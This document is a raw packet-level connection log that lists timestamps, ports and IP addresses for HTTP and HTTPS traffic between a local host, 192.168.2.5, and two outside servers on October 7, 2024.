Oct 7, 2024 03:15:37.844682932 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.844696999 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.844717026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.844731092 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.844749928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.844764948 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.844783068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.844798088 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.844815016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.844826937 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.844861031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.844875097 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.844897032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.844912052 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.844930887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.844944954 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.844964981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.844978094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.845000982 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.845012903 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.845050097 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.862776995 CEST	443	49820	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.862967014 CEST	443	49820	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.863043070 CEST	49820	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.863240004 CEST	49820	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.863255024 CEST	443	49820	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.863266945 CEST	49820	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.863274097 CEST	443	49820	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.865631104 CEST	49824	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.865645885 CEST	443	49824	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.865740061 CEST	49824	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.865844965 CEST	49824	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.865859985 CEST	443	49824	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.866527081 CEST	443	49819	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.866686106 CEST	443	49819	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.866760015 CEST	49819	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.866890907 CEST	49819	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.866903067 CEST	443	49819	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.866911888 CEST	49819	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.866915941 CEST	443	49819	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.869045973 CEST	49825	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.869111061 CEST	443	49825	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.869209051 CEST	49825	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.869311094 CEST	49825	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.869323015 CEST	443	49825	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.892335892 CEST	443	49821	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.892452955 CEST	443	49821	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.892505884 CEST	443	49821	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.892537117 CEST	49821	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.892594099 CEST	49821	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.892673016 CEST	49821	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.892673016 CEST	49821	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.892700911 CEST	443	49821	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.892724037 CEST	443	49821	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.894921064 CEST	49826	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.894953966 CEST	443	49826	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.896598101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.896652937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.896687031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.896694899 CEST	49826	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.896719933 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.896732092 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.896732092 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.896764040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.896764040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.896778107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.896811008 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.896820068 CEST	49826	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.896827936 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.896843910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.896848917 CEST	443	49826	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.896876097 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.896878004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.896912098 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.896918058 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.896943092 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.896958113 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.896962881 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.897001982 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.897007942 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.897034883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.897051096 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.897068977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.897088051 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.897102118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.897116899 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.897135973 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.897150040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.897183895 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.910101891 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.910132885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.910178900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.910187006 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.910206079 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.910221100 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.910253048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.910281897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.910288095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.910320997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.910336018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.910355091 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.910377026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.910383940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.910412073 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.910444975 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.910854101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.910882950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.910938025 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.910990000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911021948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911036968 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.911036968 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.911055088 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911077976 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.911113024 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.911118984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911171913 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911206961 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911227942 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.911259890 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911262989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.911309004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.911310911 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911360025 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.911365986 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911417007 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.911432981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911470890 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911487103 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.911504984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911524057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.911542892 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911555052 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.911573887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911592007 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.911607981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911624908 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.911640882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911660910 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.911673069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911688089 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.911717892 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.911721945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911778927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911812067 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911843061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911845922 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.911875963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911883116 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.911910057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911919117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.911942005 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.911942959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911962032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.911976099 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.911992073 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.912009001 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.912023067 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.912041903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.912060976 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.912075043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.912091017 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.912110090 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.912126064 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.912163973 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.912394047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.912446022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.912457943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.912494898 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.912498951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.912533045 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.912549019 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.912581921 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.912585020 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.912631989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.912636042 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.912683010 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.912686110 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.912715912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.912735939 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.912794113 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.912847042 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.912893057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.912930965 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.912945032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.912980080 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.912981987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913014889 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913028955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.913063049 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.913064003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913098097 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913113117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.913146973 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.913149118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913184881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913197041 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.913218975 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913250923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913280964 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.913286924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913319111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.913319111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913352013 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913355112 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.913377047 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.913387060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913408995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.913418055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913436890 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.913453102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913486004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913486958 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.913510084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.913517952 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913527966 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.913549900 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913583994 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913602114 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.913616896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913647890 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.913650036 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913666964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913685083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913717031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913757086 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913769007 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.913789988 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913824081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913826942 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.913856983 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913861036 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.913899899 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.913913965 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.913947105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913980961 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.913997889 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.914016008 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.914047956 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.914063931 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.914082050 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.914112091 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.914113998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.914143085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.914149046 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.914170980 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.914268970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.914284945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.914319992 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.914351940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.914369106 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.914381981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.914407015 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.914433956 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.914443016 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.914468050 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.914486885 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.914499998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.914515972 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.914535046 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.914550066 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.914567947 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.914583921 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.914616108 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.935564995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.935672045 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.935702085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.935745955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.935745955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.935745955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.935753107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.935802937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.935856104 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.935863018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.935888052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.935909033 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.935920954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.935952902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.935970068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.935973883 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.936002970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.936038017 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.936068058 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.936100006 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.936105013 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.936135054 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.936139107 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.936176062 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.936206102 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.976718903 CEST	443	49822	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.978126049 CEST	49822	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.978169918 CEST	443	49822	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.978796959 CEST	49822	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.978805065 CEST	443	49822	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.987555027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.987602949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.987658978 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.987679958 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.987711906 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.987715960 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.987762928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.987763882 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.987797022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.987813950 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.987829924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.987845898 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.987863064 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.987881899 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.987896919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.987912893 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.987945080 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.987988949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.988022089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.988038063 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.988055944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.988071918 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.988087893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.988105059 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.988121986 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.988137960 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.988153934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.988177061 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.988188028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.988238096 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:38.001105070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:38.001173973 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:38.001187086 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:38.001207113 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:38.001307011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:38.001341105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:38.001352072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:38.001352072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:38.001352072 CEST	49782	80	192.168.2.5	95.164.90.97
